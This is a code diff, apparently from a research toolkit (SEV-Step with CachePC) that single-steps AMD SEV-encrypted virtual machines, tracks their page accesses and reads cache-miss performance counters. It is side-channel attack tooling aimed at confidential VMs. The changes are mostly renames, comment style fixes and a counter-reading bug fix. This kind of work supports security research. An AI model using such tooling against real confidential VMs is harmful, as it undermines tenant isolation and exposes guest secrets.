kvm_page_track_mode mode); -long kvm_stop_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode); -void sev_step_handle_callback(void); +long sevstep_start_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode); +long sevstep_stop_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode); uint64_t perf_ctl_to_u64(perf_ctl_config_t *config); void write_ctl(perf_ctl_config_t *config, int cpu, uint64_t ctl_msr); void read_ctr(uint64_t ctr_msr, int cpu, uint64_t *result); -void setup_perfs(void); +void sevstep_setup_pmcs(void); -int sev_step_get_rip_kvm_vcpu(struct kvm_vcpu *vcpu, uint64_t *rip); +int sevstep_get_rip_kvm_vcpu(struct kvm_vcpu *vcpu, uint64_t *rip); diff --git a/sevstep/uspt.c b/sevstep/uspt.c @@ -225,7 +225,7 @@ _perf_state_setup_retired_instructions(void) retired_instructions_perf_config.EventSelect = 0x0c0; retired_instructions_perf_config.UintMask = 0x0; retired_instructions_perf_config.En = 0x1; - write_ctl(&retired_instructions_perf_config,batch_track_state.perf_cpu, CTL_MSR_0); + write_ctl(&retired_instructions_perf_config, batch_track_state.perf_cpu, CTL_MSR_0); } @@ -236,17 +236,17 @@ _perf_state_update_and_get_delta(uint64_t current_event_idx) { uint64_t current_value; - // check if value is "cached" + /* check if value is "cached" */ if (perf_state.delta_valid_idx == current_event_idx) { if (current_event_idx == 0) { read_ctr(CTR_MSR_0, batch_track_state.perf_cpu, &current_value); perf_state.idx_for_last_perf_reading = current_event_idx; - perf_state.last_perf_reading = current_event_idx; + perf_state.last_perf_reading = current_value; } return perf_state.delta; } - // otherwise update, but logic is only valid for two consecutive events + /* otherwise update, but logic is only valid for two consecutive events */ if (current_event_idx != perf_state.idx_for_last_perf_reading+1) { printk_ratelimited(KERN_CRIT "_perf_state_update_and_get_delta: " "last reading was for idx %llu but was queried for %llu\n", @@ -377,7 +377,7 @@ uspt_batch_tracking_handle_retrack(struct kvm_vcpu* vcpu, /* made progress, retrack everything in backlog and reset idx */ for (i = 0; i < batch_track_state.gfn_retrack_backlog_next_idx; i++) { - __track_single_page(vcpu, + sevstep_track_single_page(vcpu, batch_track_state.gfn_retrack_backlog[i], batch_track_state.tracking_type); } diff --git a/test/kvm.c b/test/kvm.c @@ -276,7 +276,7 @@ main(int argc, const char **argv) if (cachepc_fd < 0) err(1, "open"); /* init L1 miss counter */ - arg = 0x000064D8; + arg = 0x002264D8; ret = ioctl(cachepc_fd, CACHEPC_IOCTL_INIT_PMC, &arg); if (ret == -1) err(1, "ioctl fail"); diff --git a/test/sev-es.c b/test/sev-es.c @@ -485,7 +485,7 @@ main(int argc, const char **argv) if (ret != 12) errx(1, "KVM_GET_API_VERSION %d, expected 12", ret); // Init L1 miss counter - arg = 0x000064D8; + arg = 0x002264D8; ret = ioctl(cachepc_dev, CACHEPC_IOCTL_INIT_PMC, &arg); if (ret < 0) err(1, "ioctl fail"); diff --git a/test/sev.c b/test/sev.c @@ -493,7 +493,7 @@ main(int argc, const char **argv) if (ret != 12) errx(1, "KVM_GET_API_VERSION %d, expected 12", ret); // Init L1 miss counter - arg = 0x000064D8; + arg = 0x002264D8; ret = ioctl(cachepc_dev, CACHEPC_IOCTL_INIT_PMC, &arg); if (ret < 0) err(1, "ioctl fail");